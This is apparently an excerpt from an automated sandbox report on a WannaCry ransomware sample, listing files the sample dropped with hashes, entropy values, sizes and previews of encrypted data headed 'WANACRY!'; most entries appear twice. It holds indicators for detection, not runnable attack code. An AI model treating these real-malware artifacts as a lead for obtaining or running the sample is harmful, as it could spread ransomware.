                                                                                      Preview:WANACRY!......VG.Ek&H......P.{v5......../( .$.!G7(..........GW.......8p.......G... ....R:..4..A....h6,.+...7..B...J7.!.....P.d..:.j\aG2..E..K:..Ao..?|.P..^p.~.vHf.)(..Fx...Tbg.b]......g...,...G..|...j......K......II.|.;.>.w.m...-....a.n.8.&..;.=...x...............n...Zje#.f...T\.;..l0.D8.....!.ui....lq^E).\...&P....\2.0q....Y..+5.D&..U.\.Wdy...v.7.k..oT.j~....-.d..x9.P/...A.D.d..OC.....E.Ema.>V.*.=.L.:.m....DM..y#7.u..9b...c.....9.^...eRn/..z......g}.......=k.2.2.T.k.....Mw..=.1.0.F|{N...%&......$.CFR.c[7.....rl......Y"..e..,.....G.v:m.......8..o.....%.....n........W..%...c..%Y.Wg.]x......X...X...j...mz].....BH.........8....y...@s.)..<......>.*]s.C......0:a./.i5..*4...v...#..b.r.....!......P~P..8....W.R?2.....I.......|..i.$..y`.$Q+Y'.@S..#..QO]..&....$.....8..ny.Wyw3.j#....@{..../F".6L..M..H.I.~....^...!...&`..N...au.$z......^w.N[....2.S|U......c)..u03.....c/bH0.4.y.t..^.>...G..........>=.!....Q1...JO..c...Jt....%..WK1.[...!h.i
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1656
                                                                                      Entropy (8bit):7.895631220266308
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkK+gxOY+WyP7pNvEhH4g8PceakiVk3z/:olYX87pShiceHiV+z/
                                                                                      MD5:5DBBA585687AA441AFD4C0CA2175935A
                                                                                      SHA1:CC75731EB579BDC32EFB8522DF760D7EA3E72B8F
                                                                                      SHA-256:5ED3636BA4244429B6D16F766FA0B73642B02C957197D9784DC26926F9334E2A
                                                                                      SHA-512:E18051E9570F1BC59721817A56F4E2F3C3775F02AE1F0784C188B18EBC8C47AEA4D2036864393E3C9EDFD7D7EAAB2E979AB5B3381C355BE2DB2BE02B5780D3B7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........A.k..hp,.H0XhT.y....6H..Q.8.8.0...j.[7.>........5.....]..7.L6...s.{V.]..O.f.g...a.6.."#.^@{..,S......A.j.T..3..7\.G.I.?... ....8.L..Rx...-1g )...X.*...k{.....@.........M..O..=......B.H....)c.../.w..3..ig....nc.n>'.)'i.F.]+...F.YE..`2.j......Y.......3K..g.="....9..x.......-Q;'.......]lr......o?.....t.N......I....F../x-.AD.~....Kv.............o.... ^.F.j....6Z.?4.V..._l.4..M.a.5P..!..a....W#>..s.y.8.eb...A...aw..*.I....%I..8....oIe.h4.....<........~@.C.:D:.>.3jkM.......L..hqr.7e.x.i....:..8.c.G.&.C..&.NR2y.r.S.X..J..Z......@.M1.....GM..........L"...XH9..A...._......j..P...j..M_P...[_...X...o.b...MV9....@....G.....t.P.....&.IC.EK....Q.....)7.}.........</....<.5L....#"P.......lr...h.2.......Y.*.9.......m0.d._..W..V.._..?....)..O.+...1.aJM.l.F9..R..x.\.!8..IE.-!....).~..7....P>...]W...J)qr1HZMD.<&.........}MNBE...mz.cR..........-..+;..m.C.z.uk...0o........G.F..0yK.*L[E>..(...|.ct...d.~+....t.g..2BE|...'......8~5..d....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1656
                                                                                      Entropy (8bit):7.895631220266308
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkK+gxOY+WyP7pNvEhH4g8PceakiVk3z/:olYX87pShiceHiV+z/
                                                                                      MD5:5DBBA585687AA441AFD4C0CA2175935A
                                                                                      SHA1:CC75731EB579BDC32EFB8522DF760D7EA3E72B8F
                                                                                      SHA-256:5ED3636BA4244429B6D16F766FA0B73642B02C957197D9784DC26926F9334E2A
                                                                                      SHA-512:E18051E9570F1BC59721817A56F4E2F3C3775F02AE1F0784C188B18EBC8C47AEA4D2036864393E3C9EDFD7D7EAAB2E979AB5B3381C355BE2DB2BE02B5780D3B7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........A.k..hp,.H0XhT.y....6H..Q.8.8.0...j.[7.>........5.....]..7.L6...s.{V.]..O.f.g...a.6.."#.^@{..,S......A.j.T..3..7\.G.I.?... ....8.L..Rx...-1g )...X.*...k{.....@.........M..O..=......B.H....)c.../.w..3..ig....nc.n>'.)'i.F.]+...F.YE..`2.j......Y.......3K..g.="....9..x.......-Q;'.......]lr......o?.....t.N......I....F../x-.AD.~....Kv.............o.... ^.F.j....6Z.?4.V..._l.4..M.a.5P..!..a....W#>..s.y.8.eb...A...aw..*.I....%I..8....oIe.h4.....<........~@.C.:D:.>.3jkM.......L..hqr.7e.x.i....:..8.c.G.&.C..&.NR2y.r.S.X..J..Z......@.M1.....GM..........L"...XH9..A...._......j..P...j..M_P...[_...X...o.b...MV9....@....G.....t.P.....&.IC.EK....Q.....)7.}.........</....<.5L....#"P.......lr...h.2.......Y.*.9.......m0.d._..W..V.._..?....)..O.+...1.aJM.l.F9..R..x.\.!8..IE.-!....).~..7....P>...]W...J)qr1HZMD.<&.........}MNBE...mz.cR..........-..+;..m.C.z.uk...0o........G.F..0yK.*L[E>..(...|.ct...d.~+....t.g..2BE|...'......8~5..d....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1800
                                                                                      Entropy (8bit):7.905060150023682
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkMLhaTprn6meybACq+3wp2yeit1tupeaOzkJK6X9RsrDpK8MKE4i6YwXce/9gg/:bkqMBP0kEH4ManE09qRGt4iUXGdffexx
                                                                                      MD5:D4B7F8DDA005C56A53C03B6E8BB84EED
                                                                                      SHA1:95D2E39851B7DDFE4845A8EF3DE484688AEBA3C4
                                                                                      SHA-256:53A27EE14B06E123E641465538AF3EE8D4FAE15804FB7B43FACEC66FDD5774AD
                                                                                      SHA-512:63671FDD832A332FC04DAF749AE0329733D90C406B609C110C7A317582661926CE03F136E84CFE1F3D69C253AA0A6E2DEE0AA27557AB21F49E74042757DFB8A8
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......%.B6....))..<@h..C1.{.......v.........8M1?g.WV.:..8..A.u.|Q..b......E.{..J.D............bDquc...Y.<)n$..~V.c......h.....I....z.[.l.JCAGCv.....j...)U.A......=h.Sg.z....Gs.._.\du.(.........{F0....,[...<.R2.b...|...C......s1.Y......d!Xx...#]h7..............L.......C.?.T..H..M;.M..8.Uy'nQ....wmu.8G.$.J..4.......x....c.1H.....Z..O=.}....0....$..lP.).iE..'".B.Y..],....U...k3e..'.$.:h{".|Wr.....x.L9..)./.S...F@.........I...u...v.Q.5G.\.s..H....{.#...!'N.`m.d.......G..l.GV)uT..q..3.....h..$.&c%w..^[.Y.@)....x5vr.a.!-Ci.>.p.A...MP..t.._A...W.(....B....S.7^G+f.p(*...w.<gO#.K..9r....xK....w....^.#...j.....5.2.#.~..4.o......Y.W..,d..q_:V.].c.r.D......J.H`....->Z..En.........M...Gj.ky.S.O..F..je....c?..r.z.u).".f77jZ..C....%....,..g=lpAWy.T..H.~.e..s.&f..e.f.....1...U.f.....Q.X-ua.X)..`=......~<k.....s.Og..D...<.........|l..GIj..E..Z..p^....?.ei.y..R+h.4...R.h..........wL?c...9\dm;|..+.......*....3..sO.;....I,...Xw...[../.[..[.m.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1800
                                                                                      Entropy (8bit):7.905060150023682
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkMLhaTprn6meybACq+3wp2yeit1tupeaOzkJK6X9RsrDpK8MKE4i6YwXce/9gg/:bkqMBP0kEH4ManE09qRGt4iUXGdffexx
                                                                                      MD5:D4B7F8DDA005C56A53C03B6E8BB84EED
                                                                                      SHA1:95D2E39851B7DDFE4845A8EF3DE484688AEBA3C4
                                                                                      SHA-256:53A27EE14B06E123E641465538AF3EE8D4FAE15804FB7B43FACEC66FDD5774AD
                                                                                      SHA-512:63671FDD832A332FC04DAF749AE0329733D90C406B609C110C7A317582661926CE03F136E84CFE1F3D69C253AA0A6E2DEE0AA27557AB21F49E74042757DFB8A8
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......%.B6....))..<@h..C1.{.......v.........8M1?g.WV.:..8..A.u.|Q..b......E.{..J.D............bDquc...Y.<)n$..~V.c......h.....I....z.[.l.JCAGCv.....j...)U.A......=h.Sg.z....Gs.._.\du.(.........{F0....,[...<.R2.b...|...C......s1.Y......d!Xx...#]h7..............L.......C.?.T..H..M;.M..8.Uy'nQ....wmu.8G.$.J..4.......x....c.1H.....Z..O=.}....0....$..lP.).iE..'".B.Y..],....U...k3e..'.$.:h{".|Wr.....x.L9..)./.S...F@.........I...u...v.Q.5G.\.s..H....{.#...!'N.`m.d.......G..l.GV)uT..q..3.....h..$.&c%w..^[.Y.@)....x5vr.a.!-Ci.>.p.A...MP..t.._A...W.(....B....S.7^G+f.p(*...w.<gO#.K..9r....xK....w....^.#...j.....5.2.#.~..4.o......Y.W..,d..q_:V.].c.r.D......J.H`....->Z..En.........M...Gj.ky.S.O..F..je....c?..r.z.u).".f77jZ..C....%....,..g=lpAWy.T..H.~.e..s.&f..e.f.....1...U.f.....Q.X-ua.X)..`=......~<k.....s.Og..D...<.........|l..GIj..E..Z..p^....?.ei.y..R+h.4...R.h..........wL?c...9\dm;|..+.......*....3..sO.;....I,...Xw...[../.[..[.m.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2136
                                                                                      Entropy (8bit):7.92070402521097
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkgXNgdWzcSxJeJmETCVyVvSQlU8WR7/xey1jdNCZgRLDxPtQimjiH:ogSozvxJdEOVovSQlNWhZLCZglDxGb2H
                                                                                      MD5:3AF8493696FCE9E434C5B108C0195E7A
                                                                                      SHA1:6930F91E8E9D4FBBCA9FBD1DCDD39EDB667578E0
                                                                                      SHA-256:1B8595DFB166494A37038E368744719D39794BE930E51A76E2C2282179414993
                                                                                      SHA-512:D3CA1D8993E444ECF7824B10707818626FE6D75ECD5912F839AF8DB36762056D062CCADA3C464F7D1C5D07DAB75B612ABF7595472E51F92B094EE710EA3B4AFC
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......V.8..Y.....dZ.E..?r.dv.Q.I....J....zd.`.p.,4..%.>......v....@.d..\u#.D.......f..mW5.q......4.....=i...@...\.?.T...G...U....z.."...#..P.0@....t.&B.L..k....\......N.c_......m./Td..VC.....aO..........<pb<..L..8.\.C...Z..F....5.X...l...L\....7........(.,..Sh.7*sf.g.sy..xE...N.o...C....L/N..u...a....(6.ZM.....&..Fp.....*....k.U.;.y..o......y..i.:."....T.....H.9$.I!.....W.V.x...!........./..........6.........U.4.......2....A.?..h..?.].o....9^...y^.>...".].:.H.F..a....&.&.Qe.N7.6.9z..R..M...B.N.a..}.....n..8Z..xv.ne.)....!..cN.`.qz".8..p+.e..3>.....Ir-...Q..N...G.`;FO1a.... ..S.W.K....$...#0..F._7....... ..e..yw....qt...&...:..G4J.......(......su.q.bX..+....L.Y.0S$....l.@...<...BiJ.....W..Q...}v..Z^.F.02....{V.h....Z.).<e.7S."-...V..W|.I....r..r.:.$..3..z....A.\9[9....cb...H......._...q......P.@.4.rc...6*......"h.T..~.kj......./R.e...Q.1E.....S.wr6..p...7+...]..;.......D..(........O.E?...L...8P.%....p.c/.......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2136
                                                                                      Entropy (8bit):7.92070402521097
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkgXNgdWzcSxJeJmETCVyVvSQlU8WR7/xey1jdNCZgRLDxPtQimjiH:ogSozvxJdEOVovSQlNWhZLCZglDxGb2H
                                                                                      MD5:3AF8493696FCE9E434C5B108C0195E7A
                                                                                      SHA1:6930F91E8E9D4FBBCA9FBD1DCDD39EDB667578E0
                                                                                      SHA-256:1B8595DFB166494A37038E368744719D39794BE930E51A76E2C2282179414993
                                                                                      SHA-512:D3CA1D8993E444ECF7824B10707818626FE6D75ECD5912F839AF8DB36762056D062CCADA3C464F7D1C5D07DAB75B612ABF7595472E51F92B094EE710EA3B4AFC
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......V.8..Y.....dZ.E..?r.dv.Q.I....J....zd.`.p.,4..%.>......v....@.d..\u#.D.......f..mW5.q......4.....=i...@...\.?.T...G...U....z.."...#..P.0@....t.&B.L..k....\......N.c_......m./Td..VC.....aO..........<pb<..L..8.\.C...Z..F....5.X...l...L\....7........(.,..Sh.7*sf.g.sy..xE...N.o...C....L/N..u...a....(6.ZM.....&..Fp.....*....k.U.;.y..o......y..i.:."....T.....H.9$.I!.....W.V.x...!........./..........6.........U.4.......2....A.?..h..?.].o....9^...y^.>...".].:.H.F..a....&.&.Qe.N7.6.9z..R..M...B.N.a..}.....n..8Z..xv.ne.)....!..cN.`.qz".8..p+.e..3>.....Ir-...Q..N...G.`;FO1a.... ..S.W.K....$...#0..F._7....... ..e..yw....qt...&...:..G4J.......(......su.q.bX..+....L.Y.0S$....l.@...<...BiJ.....W..Q...}v..Z^.F.02....{V.h....Z.).<e.7S."-...V..W|.I....r..r.:.$..3..z....A.\9[9....cb...H......._...q......P.@.4.rc...6*......"h.T..~.kj......./R.e...Q.1E.....S.wr6..p...7+...]..;.......D..(........O.E?...L...8P.%....p.c/.......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):5656
                                                                                      Entropy (8bit):7.968982616646037
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:oWWuXXpR8Hwl1VOIhJ8nbkBnbI658MwHKy8IN9s81I5+zdp3DqE978BgMbHzDZs:xWkXgHkvhJ8bklblygy8wzI5+veE9gL+
                                                                                      MD5:9606823CF9A156A82B5A071AED802E4D
                                                                                      SHA1:409F416912973435F6BD65D3B98D0B32A14F9FF1
                                                                                      SHA-256:D52D7B1C5305604D4B3020AAFB2EA6C281F8B265FCD4E55D69C120FC9C264DA7
                                                                                      SHA-512:8197B6C19805C2F1FBE12FE24858289BB0A370504C049DF269F694888ED9BE531131C9D6C27653B2726A8B646B25B172928DDA9BE6A57AD79822E770AB44C6D8
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....3}a.......q.*,.V..l..+.......2=K..a.#...I.{.............).^......9..jx1../.}b.>q.`./S....`D...hd..?x=!.r....Q...x|3...mP.....]:.Zi.a}.6.........h..... .FVO...L-,..@V..G..U.%.0.(..m..@....u..g.?......G....6......../..js.. ..a.?L.#.x...+..1..J..Y..............i.*.sD...5.....Tb.[...4..{I......@......|.Y9...CQ..+!.G.........s.R.C.q......F.:.....7.E..f'U..3'.........I.....m....k[R"....6..\`L........g..$...-...N....+.<.h......d...(t.Rr}.v..xP.........C.6#....=.....X0...c..,.YG....A)[...BW...+(..0o8...".c&6..Pj.l.._...+2.4.0....P&..@./..'I......fu_..y#y.Ta..).+.Hd.Qz......2.5...[U<..j..7.....<..L..$d..v......!.&.!....x..6.`A..!e...MT.....W4.1..g~...J...b.)YX..7&w.|..I.=......yH*...o.>...!x._.a.I.m ....i..L..%....&.k.(rA..f$.H...@@-.Ee....F.$_G3..f.....I..1..hM"...<[=X.J.$..X.'D..F....aR.y..H....CU...R.g}..f.../%....C|Z.Q...y;V<..V}#....s..hS....u..f..o..R.$.....A.}.{..1Z..%.z}..W..#]..rG...r]..`.a.M.Q...Wk.A..!B?).~./ .=....p.0*...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):5656
                                                                                      Entropy (8bit):7.968982616646037
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:oWWuXXpR8Hwl1VOIhJ8nbkBnbI658MwHKy8IN9s81I5+zdp3DqE978BgMbHzDZs:xWkXgHkvhJ8bklblygy8wzI5+veE9gL+
                                                                                      MD5:9606823CF9A156A82B5A071AED802E4D
                                                                                      SHA1:409F416912973435F6BD65D3B98D0B32A14F9FF1
                                                                                      SHA-256:D52D7B1C5305604D4B3020AAFB2EA6C281F8B265FCD4E55D69C120FC9C264DA7
                                                                                      SHA-512:8197B6C19805C2F1FBE12FE24858289BB0A370504C049DF269F694888ED9BE531131C9D6C27653B2726A8B646B25B172928DDA9BE6A57AD79822E770AB44C6D8
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....3}a.......q.*,.V..l..+.......2=K..a.#...I.{.............).^......9..jx1../.}b.>q.`./S....`D...hd..?x=!.r....Q...x|3...mP.....]:.Zi.a}.6.........h..... .FVO...L-,..@V..G..U.%.0.(..m..@....u..g.?......G....6......../..js.. ..a.?L.#.x...+..1..J..Y..............i.*.sD...5.....Tb.[...4..{I......@......|.Y9...CQ..+!.G.........s.R.C.q......F.:.....7.E..f'U..3'.........I.....m....k[R"....6..\`L........g..$...-...N....+.<.h......d...(t.Rr}.v..xP.........C.6#....=.....X0...c..,.YG....A)[...BW...+(..0o8...".c&6..Pj.l.._...+2.4.0....P&..@./..'I......fu_..y#y.Ta..).+.Hd.Qz......2.5...[U<..j..7.....<..L..$d..v......!.&.!....x..6.`A..!e...MT.....W4.1..g~...J...b.)YX..7&w.|..I.=......yH*...o.>...!x._.a.I.m ....i..L..%....&.k.(rA..f$.H...@@-.Ee....F.$_G3..f.....I..1..hM"...<[=X.J.$..X.'D..F....aR.y..H....CU...R.g}..f.../%....C|Z.Q...y;V<..V}#....s..hS....u..f..o..R.$.....A.}.{..1Z..%.z}..W..#]..rG...r]..`.a.M.Q...Wk.A..!B?).~./ .=....p.0*...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):3208
                                                                                      Entropy (8bit):7.944353988270774
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:oJkId+7IVc7IzNqDiuNjq8+IUWE9qyvgO8iK:tId+7IVcUzNqDZ9azWKPDK
                                                                                      MD5:010C83B97D198D7CDB3EBE4DD7DD77AE
                                                                                      SHA1:8E685C440F47B934FB93BDEA9C387BF078E8C809
                                                                                      SHA-256:F41DE20EDC9B89FC52992030A8CC3AA7504D82028FD0463D268B4A577449523B
                                                                                      SHA-512:F1A7E31567581CF5412EB4059E1E73925D9D8E8AF5716D9C2E1EEED2BC7FD6DF2C58FD0C50E1E0428056AB7A151CA1F8D148A4F20B62A52D321A345C176C749C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......|......B:.^.....7. '...J..y...(...~...7..6Y.NC.~.Ez>.tI*.n..q.D1.aU...k.fK<...y....F...|#`.@.KV.-f...%.5f..,qB(.`......}..a..P.}e{...|U&./.H..%.63.!-....d....X19=.l..{"".N..G.ON..L~.&X.v..V....lV,....Y2.k.l._.(.;!.y.B!.}i7. .)..?,....~5......g........F..r2..W.F.a...@...i..N.2i.....'^K.S8.^C..L..S.t.J....c.aqo...(n..9...h....^.V.....l$.m...U....e-.\...d2..C..rc-.-..<.w......n=k....}.Z.=.....$.0...i....B.._2Q.9.>..-..R.-.u.|Qb..y.......I._.M.....>..XTZ(%..U..r.;l.fJ......{.+..b...A".:0X.a.c.5..+9....!.h.....^p......$.@..|.,r.l.es+."w,.~.;J_..A.%.0l.D.[..o.s.]..&.}?1........b.C........W.p..'....... ,I.c..d...v...A.H....x.j.5.D.3@.. ...J...d..b$.~...#Tk..C.4....r?2.MSeOmK9v,..2..P.F....wA.k..71...r........,.H...4..UJ.eFd..v'.(...2.<..5.R1.pu.sF.l.Hu.&..aA.E.g0.. ...^N....0..!......6.n.V.....-o.}{.lb.COl.........L.*@.6.DK.e.....E....C.\..[..^......;..D.....Z.W...KL...K......!..7P)....**..<.u.O~.....%.?...?.,}.....eD......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):3208
                                                                                      Entropy (8bit):7.944353988270774
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:oJkId+7IVc7IzNqDiuNjq8+IUWE9qyvgO8iK:tId+7IVcUzNqDZ9azWKPDK
                                                                                      MD5:010C83B97D198D7CDB3EBE4DD7DD77AE
                                                                                      SHA1:8E685C440F47B934FB93BDEA9C387BF078E8C809
                                                                                      SHA-256:F41DE20EDC9B89FC52992030A8CC3AA7504D82028FD0463D268B4A577449523B
                                                                                      SHA-512:F1A7E31567581CF5412EB4059E1E73925D9D8E8AF5716D9C2E1EEED2BC7FD6DF2C58FD0C50E1E0428056AB7A151CA1F8D148A4F20B62A52D321A345C176C749C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......|......B:.^.....7. '...J..y...(...~...7..6Y.NC.~.Ez>.tI*.n..q.D1.aU...k.fK<...y....F...|#`.@.KV.-f...%.5f..,qB(.`......}..a..P.}e{...|U&./.H..%.63.!-....d....X19=.l..{"".N..G.ON..L~.&X.v..V....lV,....Y2.k.l._.(.;!.y.B!.}i7. .)..?,....~5......g........F..r2..W.F.a...@...i..N.2i.....'^K.S8.^C..L..S.t.J....c.aqo...(n..9...h....^.V.....l$.m...U....e-.\...d2..C..rc-.-..<.w......n=k....}.Z.=.....$.0...i....B.._2Q.9.>..-..R.-.u.|Qb..y.......I._.M.....>..XTZ(%..U..r.;l.fJ......{.+..b...A".:0X.a.c.5..+9....!.h.....^p......$.@..|.,r.l.es+."w,.~.;J_..A.%.0l.D.[..o.s.]..&.}?1........b.C........W.p..'....... ,I.c..d...v...A.H....x.j.5.D.3@.. ...J...d..b$.~...#Tk..C.4....r?2.MSeOmK9v,..2..P.F....wA.k..71...r........,.H...4..UJ.eFd..v'.(...2.<..5.R1.pu.sF.l.Hu.&..aA.E.g0.. ...^N....0..!......6.n.V.....-o.}{.lb.COl.........L.*@.6.DK.e.....E....C.\..[..^......;..D.....Z.W...KL...K......!..7P)....**..<.u.O~.....%.?...?.,}.....eD......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):12520
                                                                                      Entropy (8bit):7.984768016673902
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:Hvt0YwdTMt9egReLoQVKysm+9qnTPofhWanQd:Hv0Vo9egY3V9gMTPaW7d
                                                                                      MD5:EED5A9571F660D457514EF5AC182AD7D
                                                                                      SHA1:62D944A3724AA018E79B4CF9CE140362B9103BA2
                                                                                      SHA-256:00DEFF06E0DB8876316BD85D7EAF91F3CF33CEFB2BFEA4D3513EFD37A10A6BE9
                                                                                      SHA-512:137D9C7692A6056BB3BBE8AEB2D96C62C9BFF6EA49A726E490C96DCB2BE04E79B9DB1DD1C553EB5C7E8AC83A69DBE15AD9A8E12A936C6CC037C1ACFE5EE5E726
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......v..^30.....{_.L....S..\...`..B+......HD.W...6........>X.o..H"].q.O.|c.C%t......g.bX-.H]&.j..@..MM..O#...OYL....7f.,..n$.V_..P.-)...+.I.4.jdM?.G.Bv..7.{7xoJ.p.&.......L...z.6...7......g ..M...-.yA!@m...K2.4[.......]F.,"w}..o...-.y..)=X]R..../.F$...../.......iq..M$....Q1..J.....{1....5.q....Vu..[../..9n..7.w.&...RY.#.r.z}.=..C..)......#Ko.i.5...y, N..o...XW...z..G..7.iM..nH?.d..R.B..e..&.V.G.=.&...D.A...D..?.......g..s...5T.-e}.N.*.'....E.?.l.~.@.....b..#.R..b_..]+...T..#.2...{c*...!.t.?.Z.%I.fgv+..8.U...G.}$+....%....[Y.c!...9V.......1....Y.S...\yl.GQ...`'(NpGz.!..ES?.A..HJk..w(N...}'2..[.0..b.|`..A.]xj...}..>k....T..S...3}....C....M*.......Rs....<..B.g.>..6..fK...!+%..g6C....NE.).....}Z....RFm=b.Ot.).I&....\F.C){.....$.<..e..K~..h$.......+.Z..#...~s...~....x9.~....W..c...9."(...<S6.%......G..y&...^.Aq..l"..3..]<.....#V.Un.......L.D...r....-D...t.r.....jrJrQ*.kB.o(IO..=..N^.....:.J...ZQ...zZ..1._... .D.Z..o..o....N.8%h:f.L..}
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):12520
                                                                                      Entropy (8bit):7.984768016673902
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:Hvt0YwdTMt9egReLoQVKysm+9qnTPofhWanQd:Hv0Vo9egY3V9gMTPaW7d
                                                                                      MD5:EED5A9571F660D457514EF5AC182AD7D
                                                                                      SHA1:62D944A3724AA018E79B4CF9CE140362B9103BA2
                                                                                      SHA-256:00DEFF06E0DB8876316BD85D7EAF91F3CF33CEFB2BFEA4D3513EFD37A10A6BE9
                                                                                      SHA-512:137D9C7692A6056BB3BBE8AEB2D96C62C9BFF6EA49A726E490C96DCB2BE04E79B9DB1DD1C553EB5C7E8AC83A69DBE15AD9A8E12A936C6CC037C1ACFE5EE5E726
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......v..^30.....{_.L....S..\...`..B+......HD.W...6........>X.o..H"].q.O.|c.C%t......g.bX-.H]&.j..@..MM..O#...OYL....7f.,..n$.V_..P.-)...+.I.4.jdM?.G.Bv..7.{7xoJ.p.&.......L...z.6...7......g ..M...-.yA!@m...K2.4[.......]F.,"w}..o...-.y..)=X]R..../.F$...../.......iq..M$....Q1..J.....{1....5.q....Vu..[../..9n..7.w.&...RY.#.r.z}.=..C..)......#Ko.i.5...y, N..o...XW...z..G..7.iM..nH?.d..R.B..e..&.V.G.=.&...D.A...D..?.......g..s...5T.-e}.N.*.'....E.?.l.~.@.....b..#.R..b_..]+...T..#.2...{c*...!.t.?.Z.%I.fgv+..8.U...G.}$+....%....[Y.c!...9V.......1....Y.S...\yl.GQ...`'(NpGz.!..ES?.A..HJk..w(N...}'2..[.0..b.|`..A.]xj...}..>k....T..S...3}....C....M*.......Rs....<..B.g.>..6..fK...!+%..g6C....NE.).....}Z....RFm=b.Ot.).I&....\F.C){.....$.<..e..K~..h$.......+.Z..#...~s...~....x9.~....W..c...9."(...<S6.%......G..y&...^.Aq..l"..3..]<.....#V.Un.......L.D...r....-D...t.r.....jrJrQ*.kB.o(IO..=..N^.....:.J...ZQ...zZ..1._... .D.Z..o..o....N.8%h:f.L..}
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1848
                                                                                      Entropy (8bit):7.891980865425103
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkJtB+vOKkxrYIRssNtvK7H1I5fzbc5AYHK5W9l/:ohPQsN5mH1uUA+KID/
                                                                                      MD5:23EF10766D072D4660056713F2212015
                                                                                      SHA1:4C2EC352A220C24047F8B43900F88DBF93169CA6
                                                                                      SHA-256:9CC3321EE33726480ECAC7CC07CE2B834B8DC4F9A901213500AAD4A733B82921
                                                                                      SHA-512:ED882353D5EEBF581758FEB0DC5CFD440B4D61E0A6687A8AA236C3B47E322145A4A0AAEA64F8042ACF0EFF33A099D2A7A3BD7C41E0AC0BC3156A98732B499A6F
                                                                                      Malicious:false
                                                                                      Reputation:low
